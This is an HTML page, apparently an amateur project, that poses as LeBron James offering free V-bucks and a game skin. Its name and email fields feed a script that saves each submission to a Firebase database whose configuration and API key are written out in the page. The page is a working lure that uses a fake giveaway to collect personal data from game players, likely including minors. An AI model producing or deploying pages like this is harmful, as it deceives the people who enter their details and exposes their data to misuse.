<!DOCTYPE html>
<head>
  <title>lebron james</title>
  <style>
    body {
      text-align: center;
      background: url("https://th.bing.com/th/id/OIP.RVmo4ts79AdkLhQbtr2sGAHaEu?pid=ImgDet&rs=1");
      background-size: cover;
      background-position: center;
      color: white;
      font-family: helvetica;
    }
    p {
      font-size: 22px;
      color: yellow;
    }
    input {
      border: 0;
      padding: 10px;
      font-size: 18px;
    }
    input[type="submit"] {
      background: Yellow;
      color: Purple;
    }
    img{
      width 500px;
      border-radius 400px;
    }
  </style>
</head>
<body>
  <img src="https://www.lakerszone.us/__export/1667663396083/sites/lakerszone/img/2022/11/05/lebryant.jpg_1941532123.jpg">
  <p>Its me Lebron james log in for free V-bucks and my new skin FOR FREE!!!</p>
  <input id="Name" placeholder="Your name" >
  <input type="email" id="Email" placeholder="Your email" >
  <input id="submit" type="submit">
  
  
  
  <script type="module">
    // Import the functions you need from the SDKs you need
    import { initializeApp } from "https://www.gstatic.com/firebasejs/9.14.0/firebase-app.js";
   import { getDatabase, ref, set } from "https://www.gstatic.com/firebasejs/9.14.0/firebase-database.js";
    // TODO: Add SDKs for Firebase products that you want to use
    // https://firebase.google.com/docs/web/setup#available-libraries

    // Your web app's Firebase configuration
    // For Firebase JS SDK v7.20.0 and later, measurementId is optional
    const firebaseConfig = {
      apiKey: "AIzaSyB5JJ09hQe1JvYcOVVKU-e4vm8sVZzZrV8",
      authDomain: "deez-30ca8.firebaseapp.com",
      projectId: "deez-30ca8",
      storageBucket: "deez-30ca8.appspot.com",
      messagingSenderId: "48995337308",
      appId: "1:48995337308:web:336f96a04f1232ce7c5299",
      measurementId: "G-D94VNDJWL8"
    };

    // Initialize Firebase
    const app = initializeApp(firebaseConfig);
    const db = getDatabase(app);
const Name = document.querySelector("#Name") 
const Email = document.querySelector("#Email")
document.querySelector('#submit').addEventListener('click', Submit)
    function Submit() {
    	  const timestamp = buildTimestamp()
	  
    	  set(ref(db, timestamp), {
    		  Name: Name.value,
    	      email: Email.value,
    	  });

    	  Name.value = ""
    	  Email.value = ""
    	}
	function buildTimestamp() {
	  const now = new Date();
	  let timestamp = now.getFullYear().toString() + "/";
	  //const month = now.toLocaleString('default', { month: 'long' });

	  let month = now.getMonth()+1   //add 1 because Javascript uses 0 for January
	  month = month.toString()
	  month = addLeadingZero(month)
	  timestamp += month + "/"; 

	  let date = now.getDate().toString()
	  date = addLeadingZero(date)
	  timestamp += date + "/";

	  let hours = now.getHours().toString()
	  hours = addLeadingZero(hours)
	  timestamp += hours + ":";

	  let minutes = now.getMinutes().toString()
	  minutes = addLeadingZero(minutes)
	  timestamp += minutes + ":";

	  let seconds = now.getSeconds().toString()
	  seconds = addLeadingZero(seconds)
	  timestamp += seconds;
  
	  return timestamp
	}
	
	function addLeadingZero(units) {
		if (units.length < 2) {
			units = "0" + units
		}
		return units
	}
    
    

  </script>
  
  
</body>